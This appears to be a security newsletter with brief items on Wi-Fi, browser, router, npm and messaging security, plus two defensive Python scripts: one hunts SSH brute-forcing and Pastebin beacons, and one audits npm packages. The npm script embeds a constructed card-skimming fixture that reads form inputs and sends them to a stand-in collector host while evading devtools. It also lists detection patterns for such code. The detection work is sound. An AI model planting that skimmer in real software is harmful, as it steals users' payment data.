It will include improved protection against weak passwords, improved setup for devices with a limited interface, and individualized data encryption in open networks. More details will be made available at launch later this year.
Something I only read after I sent the last newsletter. It might be old news to some, but it's important enough to include. So, install those browser updates.
Also, WebKit has an elaborate post on how Meltdown/Spectre impacts them.
If you own one of those, you'll want to update fast. Among the problems is a hard-coded backdoor account (interestingly, the same backdoor found in a D-Link device a few years back), and it appears trivial to exploit, even when the device is only reachable on a LAN.
An interesting write-up showing how the botnet works. It's written in Python, spreads by brute-forcing SSH accounts and exploiting a recent JBoss vulnerability, and uses Pastebin to retrieve new C&C addresses. Its operator has made about $60,000 in Monero in the last month.
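Two of the behaviours described above leave traces you can hunt for on your own hosts: the SSH brute-forcing shows up in sshd's auth log, and the Pastebin dead-drop shows up in egress or proxy logs. The script below is an added example written for this newsletter, not code from the write-up or from the botnet; the log lines are constructed, the log formats (standard syslog sshd lines and a simple "timestamp src method url status" proxy format) and the thresholds are assumptions, and the JBoss exploitation is not covered.

```python
"""Hunt for SSH brute-forcing and Pastebin C&C fetches in constructed log samples."""
import re
from collections import Counter, defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Constructed sshd lines in syslog format (not real logs).
AUTH_LOG = """\
Jan 14 03:12:01 web1 sshd[2131]: Failed password for root from 203.0.113.7 port 51122 ssh2
Jan 14 03:12:02 web1 sshd[2131]: Failed password for root from 203.0.113.7 port 51124 ssh2
Jan 14 03:12:02 web1 sshd[2133]: Failed password for invalid user admin from 203.0.113.7 port 51130 ssh2
Jan 14 03:12:03 web1 sshd[2135]: Failed password for invalid user ubuntu from 203.0.113.7 port 51133 ssh2
Jan 14 03:12:04 web1 sshd[2137]: Failed password for invalid user pi from 203.0.113.7 port 51140 ssh2
Jan 14 03:12:05 web1 sshd[2139]: Accepted password for root from 203.0.113.7 port 51150 ssh2
Jan 14 03:15:40 web1 sshd[2201]: Failed password for alice from 198.51.100.23 port 40022 ssh2
Jan 14 03:15:55 web1 sshd[2203]: Accepted publickey for alice from 198.51.100.23 port 40023 ssh2
"""

# Constructed egress log: "<iso timestamp> <src ip> <method> <url> <status>" (assumed format).
PROXY_LOG = """\
2018-01-14T03:20:11Z 10.0.0.12 GET https://pastebin.com/raw/a1b2c3d4 200
2018-01-14T03:20:12Z 10.0.0.12 GET https://pastebin.com/raw/a1b2c3d4 200
2018-01-14T03:25:00Z 10.0.0.15 GET https://github.com/ 200
2018-01-14T03:31:05Z 10.0.0.12 POST http://203.0.113.44:8080/ 200
"""

TS = r"(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d)"
FAILED_RE = re.compile(TS + r" \S+ sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)")
ACCEPTED_RE = re.compile(TS + r" \S+ sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>[\d.]+)")


def parse_ts(ts, year=2018):
    """syslog lines carry no year; the caller supplies one (2018 assumed here)."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def ssh_bruteforce(log, threshold=5, window_s=60):
    """Sources with >= threshold failed password logins inside window_s seconds.

    For each flagged source also report a later successful *password* login,
    which is the signal that the guessing worked (key-based logins are ignored).
    """
    failures = defaultdict(list)
    accepted = []
    for line in log.splitlines():
        m = FAILED_RE.match(line)
        if m:
            failures[m["ip"]].append((parse_ts(m["ts"]), m["user"]))
            continue
        m = ACCEPTED_RE.match(line)
        if m and m["method"] == "password":
            accepted.append((parse_ts(m["ts"]), m["ip"], m["user"]))

    findings = {}
    for ip, events in failures.items():
        events.sort()
        for i in range(len(events)):            # sliding window over sorted failures
            j = i
            while j < len(events) and (events[j][0] - events[i][0]).total_seconds() <= window_s:
                j += 1
            if j - i >= threshold:
                first = events[i][0]
                findings[ip] = {
                    "attempts": j - i,
                    "users": sorted({u for _, u in events[i:j]}),
                    "succeeded_as": [u for t, a, u in accepted if a == ip and t >= first],
                }
                break
    return findings


def paste_beacons(log, dead_drop_hosts=frozenset({"pastebin.com"})):
    """Count fetches of paste sites per internal source.

    Servers rarely have a legitimate reason to pull from Pastebin, and the botnet
    in the write-up reads its C&C addresses from there, so any hit is worth a look.
    """
    counts = Counter()
    for line in log.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        src, url = parts[1], parts[3]
        if (urlsplit(url).hostname or "") in dead_drop_hosts:
            counts[src] += 1
    return counts


if __name__ == "__main__":
    print(ssh_bruteforce(AUTH_LOG))
    print(paste_beacons(PROXY_LOG))
```

On the constructed sample, 203.0.113.7 is flagged with five failures across four usernames followed by a successful password login as root, while the single typo by alice (who then logs in with a key) is not; 10.0.0.12 is the only host fetching from Pastebin. In practice, feed `journalctl -u ssh` or `/var/log/auth.log` into the first function and your proxy or NetFlow export into the second, and tune the threshold to your environment.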
But, luckily, not nearly as serious this time. When you're already authenticated as an admin, anyone at the keyboard can change your App Store settings using any password. Not terrifying, but not confidence-inspiring either.
npm's security process mistakenly flagged a legitimate account as malicious and pulled its packages from the registry. It was a false positive, and many other packages that depended on them came down with it. The above link gives a short description, and they provided a more elaborate post-mortem here.
Speaking of npm, here's a thought-provoking post on how one could set up a nasty npm module that harvests credit card information: without it being visible in the code on GitHub, disabling itself when dev tools are open, and more. Hacker News discussion on it here.
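The defensive takeaways from that post are that the published tarball is what runs, not what's on GitHub, and that the harvesting code needs a way to read form fields, a way to send them out, and usually a way to hide. The script below is an added example for this newsletter (not code from the post or from npm): it diffs a package's published files against a repository checkout and runs a few heuristic indicators over the JavaScript. The package contents are constructed, and the indicator regexes are my own assumptions; they catch the plain patterns the post describes and will miss anything properly obfuscated.

```python
"""Audit a published npm package against its repo and scan for harvesting indicators."""
import re

# Heuristic indicators, grouped by what the harvesting module needs to do.
# The patterns are assumptions for this example, not a complete ruleset.
INDICATORS = {
    "form_harvest": re.compile(
        r"querySelectorAll\(\s*['\"]input|\[type=['\"]?password|"
        r"addEventListener\(\s*['\"](?:submit|keyup|input)['\"]"),
    "devtools_evasion": re.compile(
        r"outerWidth\s*-\s*(?:window\.)?innerWidth|outerHeight\s*-\s*(?:window\.)?innerHeight|devtools"),
    "exfil": re.compile(
        r"sendBeacon\(|fetch\(\s*['\"]https?://|XMLHttpRequest|new Image\(\)\.src"),
    "obfuscation": re.compile(r"String\.fromCharCode|atob\(|eval\(|new Function\("),
}


def scan_source(src):
    """Names of the indicators that fire on one JavaScript source string."""
    return {name for name, rx in INDICATORS.items() if rx.search(src)}


def risk(hits):
    """Reading inputs *and* sending data out is the combination that matters."""
    if {"form_harvest", "exfil"} <= hits:
        return "high"
    return "medium" if hits else "low"


def published_vs_repo(published, repo):
    """Paths in the published tarball that are missing from, or differ from, the repo.

    Both arguments map path -> file contents. In real use, build them from
    `npm pack` output and a `git checkout` of the tagged release.
    """
    return sorted(p for p, body in published.items() if repo.get(p) != body)


def audit(published, repo):
    """Per-JS-file report: indicators, risk level, and whether the file is reviewable on GitHub."""
    report = {}
    for path, body in published.items():
        if not path.endswith(".js"):
            continue
        hits = scan_source(body)
        report[path] = {
            "hits": sorted(hits),
            "risk": risk(hits),
            "in_repo_unchanged": repo.get(path) == body,
        }
    return report


# Constructed package: the repo holds an innocent padding helper ...
REPO = {
    "package.json": '{"name": "pad-ish", "version": "1.0.0", "main": "index.js"}',
    "index.js": "module.exports = function pad(s, n, c) { c = c || ' '; "
                "while (s.length < n) s = c + s; return s; };\n",
}
# ... while the published tarball pulls in an extra file that never went through review.
PUBLISHED = dict(REPO)
PUBLISHED["index.js"] = REPO["index.js"] + "require('./telemetry.min.js');\n"
PUBLISHED["telemetry.min.js"] = (
    "(function(){if(window.outerWidth-window.innerWidth>160)return;"   # bail if devtools are docked
    "document.addEventListener('submit',function(e){var d={};"
    "e.target.querySelectorAll('input').forEach(function(i){d[i.name]=i.value;});"
    "navigator.sendBeacon('https://collector.example/c',JSON.stringify(d));});})();"
)

if __name__ == "__main__":
    print("unreviewed or changed:", published_vs_repo(PUBLISHED, REPO))
    for path, entry in audit(PUBLISHED, REPO).items():
        print(path, entry)
```

The diff against the repo is the check that does the real work: a file that exists only in the tarball, or an entry point that differs from what GitHub shows, deserves a read regardless of what the heuristics say. Run it on the transitive tree, since the post's point is that the nasty code sits several dependencies deep.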
Sounds daunting and got quite a bit of press, but it has severe limitations. The attacker would have to compromise WhatsApp's servers, wouldn't see old messages, and everyone in the group would see a notification. Hopefully they'll fix it, but there's no reason to panic.
They're integrating the Signal protocol in a feature called 'Private Conversations'. In it, all audio calls and text messages will be encrypted, as will attachments. Encrypted video calls and group chats aren't included yet.
Needless to say, you'd better be installing updates this week if you get them. This might be useful: it's a GitHub repo that keeps tabs on all rolled-out updates.
Great resource on secure programming for PHP developers.
A nice overview of everything loosely related to Linux that happened last year in security.
Use the dead accurate Netsparker web application security scanner to do the work for you, including eliminating false positives.